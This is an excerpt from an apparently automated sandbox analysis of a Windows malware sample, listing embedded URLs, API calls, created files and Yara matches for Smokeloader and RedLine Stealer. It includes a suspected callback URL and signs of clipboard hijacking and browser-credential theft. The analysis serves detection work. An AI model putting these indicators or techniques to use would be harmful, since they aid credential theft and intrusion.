                    Source: hlyG1m5UmO.exe, mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.drString found in binary or memory: http://ocsp.digicert.com0A
                    Source: hlyG1m5UmO.exe, mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.drString found in binary or memory: http://ocsp.digicert.com0N
                    Source: hlyG1m5UmO.exe, mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.drString found in binary or memory: http://ocsp.digicert.com0X
                    Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Fires.0.dr, Blank.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                    Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Fires.0.dr, Blank.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                    Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmp, hlyG1m5UmO.exe, 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmp, Fires.0.dr, Blank.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                    Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Fires.0.dr, Blank.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                    Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Fires.0.dr, Blank.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                    Source: Amcache.hve.19.drString found in binary or memory: http://upx.sf.net
                    Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Blank.pif, 0000000B.00000000.2148373392.0000000000329000.00000002.00000001.01000000.00000008.sdmp, Blank.pif, 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmp, Fires.0.dr, Blank.pif.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
                    Source: hlyG1m5UmO.exe, mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: 1248.tmp.exe, 1248.tmp.exe, 00000010.00000002.3373439337.000000006C1AD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.16.dr, mozglue.dll.16.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                    Source: 1248.tmp.exe, 00000010.00000002.3373295475.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3360242480.000000001ADD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                    Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: LocalCGIDAAAKJJ.exe, 0000002B.00000000.3327544133.0000000000812000.00000002.00000001.01000000.0000000E.sdmp, seed[1].exe.16.dr, LocalCGIDAAAKJJ.exe.16.drString found in binary or memory: https://api.ipify.orggSOFTWARE
                    Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, FCAFIJJJKEGIECAKKEHI.16.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                    Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, FCAFIJJJKEGIECAKKEHI.16.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                    Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, FCAFIJJJKEGIECAKKEHI.16.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, FCAFIJJJKEGIECAKKEHI.16.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                    Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: FCAFIJJJKEGIECAKKEHI.16.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.drString found in binary or memory: https://mozilla.org0/
                    Source: Blank.pif, 0000000F.00000002.3346669929.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
                    Source: Blank.pifString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
                    Source: Blank.pif, 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DEvector
                    Source: Blank.pif, 0000000F.00000002.3346669929.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
                    Source: FCGCFCAFIIEBGCBFCAKKJKJJKK.16.drString found in binary or memory: https://support.mozilla.org
                    Source: FCGCFCAFIIEBGCBFCAKKJKJJKK.16.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: FCGCFCAFIIEBGCBFCAKKJKJJKK.16.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                    Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, FCAFIJJJKEGIECAKKEHI.16.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                    Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Fires.0.dr, Blank.pif.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                    Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, FCAFIJJJKEGIECAKKEHI.16.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                    Source: mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: Blank.pif.2.drString found in binary or memory: https://www.globalsign.com/repository/0
                    Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Fires.0.dr, Blank.pif.2.drString found in binary or memory: https://www.globalsign.com/repository/06
                    Source: 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: FCGCFCAFIIEBGCBFCAKKJKJJKK.16.drString found in binary or memory: https://www.mozilla.org
                    Source: 1248.tmp.exe, 00000010.00000002.3346073741.000000000045A000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.mozilla.org/about/
                    Source: FCGCFCAFIIEBGCBFCAKKJKJJKK.16.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                    Source: 1248.tmp.exe, 00000010.00000002.3346073741.000000000045A000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                    Source: FCGCFCAFIIEBGCBFCAKKJKJJKK.16.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                    Source: 1248.tmp.exe, 00000010.00000002.3346073741.000000000045A000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                    Source: 1248.tmp.exe, 00000010.00000003.3192130266.000000002D013000.00000004.00000020.00020000.00000000.sdmp, FCGCFCAFIIEBGCBFCAKKJKJJKK.16.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: 1248.tmp.exe, 00000010.00000002.3346073741.000000000045A000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
                    Source: 1248.tmp.exe, 00000010.00000002.3346073741.000000000045A000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
                    Source: FCGCFCAFIIEBGCBFCAKKJKJJKK.16.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: 1248.tmp.exe, 00000010.00000003.3192130266.000000002D013000.00000004.00000020.00020000.00000000.sdmp, FCGCFCAFIIEBGCBFCAKKJKJJKK.16.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                    Source: 1248.tmp.exe, 00000010.00000002.3346073741.000000000045A000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                    Source: 1248.tmp.exe, 00000010.00000003.3192130266.000000002D013000.00000004.00000020.00020000.00000000.sdmp, FCGCFCAFIIEBGCBFCAKKJKJJKK.16.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                    Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.5:49978 version: TLS 1.2
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002D4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,15_2_002D4830
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,15_2_004016E3
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_00402849 InternetReadFile,_strlen,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GlobalFree,15_2_00402849
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002D4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,15_2_002D4632
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002ED164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,15_2_002ED164

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 00000010.00000002.3348010697.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000010.00000002.3347378928.00000000006B3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C19B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,16_2_6C19B700
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C19B8C0 rand_s,NtQueryVirtualMemory,16_2_6C19B8C0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C19B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,16_2_6C19B910
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C13F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,16_2_6C13F280
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002C4254: CreateFileW,DeviceIoControl,CloseHandle,15_2_002C4254
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002B8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,15_2_002B8F2E
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002C5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,15_2_002C5778
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeFile created: C:\Windows\RoutesDeafJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeFile created: C:\Windows\HumanitySurgeryJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeFile created: C:\Windows\PriorityAvoidingJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeFile created: C:\Windows\EnvelopeTedJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeFile created: C:\Windows\LeadUnitsJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeFile created: C:\Windows\UcDildosJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeCode function: 0_2_0040497C0_2_0040497C
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeCode function: 0_2_00406ED20_2_00406ED2
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeCode function: 0_2_004074BB0_2_004074BB
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002823F515_2_002823F5
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002E840015_2_002E8400
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0029650215_2_00296502
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0029265E15_2_0029265E
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0026E6F015_2_0026E6F0
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0028282A15_2_0028282A
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002989BF15_2_002989BF
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002E0A3A15_2_002E0A3A
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_00296A7415_2_00296A74
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0028CD5115_2_0028CD51
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002BEDB215_2_002BEDB2
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002C8E4415_2_002C8E44
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002E0EB715_2_002E0EB7
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_00296FE615_2_00296FE6
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0026B02015_2_0026B020
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002833B715_2_002833B7
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0028F40915_2_0028F409
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0027D45D15_2_0027D45D
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002694E015_2_002694E0
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0027F62815_2_0027F628
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0026166315_2_00261663
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0026F6A015_2_0026F6A0
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002816B415_2_002816B4
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002878C315_2_002878C3
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_00281BA815_2_00281BA8
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0028DBA515_2_0028DBA5
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_00269C8015_2_00269C80
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_00299CE515_2_00299CE5
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0027DD2815_2_0027DD28
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_00281FC015_2_00281FC0
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0028BFD615_2_0028BFD6
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0041504B15_2_0041504B
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0042916215_2_00429162
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_004081FB15_2_004081FB
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_004381A315_2_004381A3
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_004285C415_2_004285C4
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0042E6FA15_2_0042E6FA
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_004296A015_2_004296A0
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_004177EF15_2_004177EF
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0041486515_2_00414865
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_004388B915_2_004388B9
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0042893615_2_00428936
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0040FAAB15_2_0040FAAB
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_00428BE015_2_00428BE0
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_00419BEF15_2_00419BEF
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0043EC4415_2_0043EC44
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0042FCF015_2_0042FCF0
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_00428EA715_2_00428EA7
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1335A016_2_6C1335A0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C175C1016_2_6C175C10
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C182C1016_2_6C182C10
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1AAC0016_2_6C1AAC00
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1A542B16_2_6C1A542B
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1A545C16_2_6C1A545C
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C14544016_2_6C145440
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C146C8016_2_6C146C80
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1934A016_2_6C1934A0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C19C4A016_2_6C19C4A0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C15D4D016_2_6C15D4D0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1464C016_2_6C1464C0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C176CF016_2_6C176CF0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C13D4E016_2_6C13D4E0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C16051216_2_6C160512
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C15ED1016_2_6C15ED10
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C14FD0016_2_6C14FD00
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C170DD016_2_6C170DD0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1985F016_2_6C1985F0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C177E1016_2_6C177E10
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C18560016_2_6C185600
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C199E3016_2_6C199E30
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C159E5016_2_6C159E50
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C173E5016_2_6C173E50
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C15464016_2_6C154640
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C182E4E16_2_6C182E4E
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C13C67016_2_6C13C670
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1A6E6316_2_6C1A6E63
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C155E9016_2_6C155E90
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C19E68016_2_6C19E680
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C194EA016_2_6C194EA0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C13BEF016_2_6C13BEF0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C14FEF016_2_6C14FEF0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1A76E316_2_6C1A76E3
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C17771016_2_6C177710
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C149F0016_2_6C149F00
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C1877A016_2_6C1877A0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C166FF016_2_6C166FF0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C13DFE016_2_6C13DFE0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C14781016_2_6C147810
